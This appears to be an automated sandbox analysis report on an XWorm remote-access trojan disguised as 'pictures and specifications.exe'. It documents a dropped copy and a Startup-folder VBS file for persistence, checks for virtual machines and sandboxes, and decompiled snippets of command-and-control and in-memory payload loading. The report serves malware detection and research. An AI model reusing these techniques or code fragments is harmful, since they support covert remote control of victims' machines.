Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f2126d15-5615-4b03-9372-811e846f83da

Jump to behavior

Source: pictures and specifications.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: pictures and specifications.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\pictures and specifications.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: pictures and specifications.exe	Virustotal: Detection: 36%
Source: pictures and specifications.exe	ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\pictures and specifications.exe

File read: C:\Users\user\Desktop\pictures and specifications.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pictures and specifications.exe "C:\Users\user\Desktop\pictures and specifications.exe"
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process created: C:\Users\user\Desktop\pictures and specifications.exe "C:\Users\user\Desktop\pictures and specifications.exe"
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 928
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process created: C:\Users\user\Desktop\pictures and specifications.exe "C:\Users\user\Desktop\pictures and specifications.exe"	Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: pictures and specifications.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: pictures and specifications.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\System.pdbCp source: pictures and specifications.exe, 00000001.00000002.2928927089.00000000013F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\pictures and specifications.PDB source: pictures and specifications.exe, 00000001.00000002.2928637040.0000000000DF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: pictures and specifications.exe, 00000001.00000002.2928927089.00000000013C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: pictures and specifications.exe, 00000000.00000002.1812113869.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\pictures and specifications.PDBV source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: pictures and specifications.exe, 00000000.00000002.1812113869.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbf source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: pictures and specifications.exe, 00000001.00000002.2928927089.00000000013F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001383000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: pictures and specifications.exe, 00000001.00000002.2928637040.0000000000DF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb06A source: pictures and specifications.exe, 00000001.00000002.2928927089.0000000001398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: pictures and specifications.exe, 00000001.00000002.2928927089.00000000013C4000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: pictures and specifications.exe, ResponsiveMapper.cs	.Net Code: MoveMapper System.AppDomain.Load(byte[])
Source: IsPrimitive.exe.0.dr, ResponsiveMapper.cs	.Net Code: MoveMapper System.AppDomain.Load(byte[])
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.pictures and specifications.exe.5c90000.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.pictures and specifications.exe.5c90000.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.pictures and specifications.exe.5c90000.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.pictures and specifications.exe.5c90000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.pictures and specifications.exe.5c90000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.pictures and specifications.exe.38314f0.5.raw.unpack, ResponsiveMapper.cs	.Net Code: MoveMapper System.AppDomain.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.pictures and specifications.exe.59e0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pictures and specifications.exe.59e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1811009270.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pictures and specifications.exe PID: 7300, type: MEMORYSTR

Source: 0.2.pictures and specifications.exe.5570000.6.raw.unpack, BfULaHpr08oK8bZmDSn.cs

High entropy of concatenated method names: 'd9Up23p1QW', 'dThp809QiF', 'oU8pdO3raJ', 'XBLpTcpWXE', 'h63p98MQkh', 'VlcpDETR5D', 'U6QpjKUBbb', 'w0XpIrc79T', 'QocpqAnLFW', 'nqfp42HjIe'

Source: C:\Users\user\Desktop\pictures and specifications.exe

File created: C:\Users\user\AppData\Roaming\IsPrimitive.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\pictures and specifications.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsPrimitive.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\pictures and specifications.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsPrimitive.vbs

Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsPrimitive.vbs

Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: pictures and specifications.exe PID: 7300, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: pictures and specifications.exe, 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\pictures and specifications.exe	Memory allocated: E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Memory allocated: 2820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Memory allocated: 2770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Memory allocated: 2D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Memory allocated: 4EE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: pictures and specifications.exe, 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: pictures and specifications.exe, 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: pictures and specifications.exe, 00000000.00000002.1797795488.00000000009D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\pictures and specifications.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.pictures and specifications.exe.5ce0000.10.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
Source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Source: C:\Users\user\Desktop\pictures and specifications.exe

Process created: C:\Users\user\Desktop\pictures and specifications.exe "C:\Users\user\Desktop\pictures and specifications.exe"

Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe	Queries volume information: C:\Users\user\Desktop\pictures and specifications.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Queries volume information: C:\Users\user\Desktop\pictures and specifications.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\pictures and specifications.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\pictures and specifications.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.pictures and specifications.exe.2963aa4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pictures and specifications.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2928492353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1798222881.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pictures and specifications.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pictures and specifications.exe PID: 7476, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.pictures and specifications.exe.2963aa4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.pictures and specifications.exe.2963aa4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pictures and specifications.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2928492353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1798222881.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pictures and specifications.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pictures and specifications.exe PID: 7476, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pictures and specifications.exe	36%	Virustotal		Browse
pictures and specifications.exe	37%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\IsPrimitive.exe	37%	ReversingLabs

Source	Detection	Scanner	Label
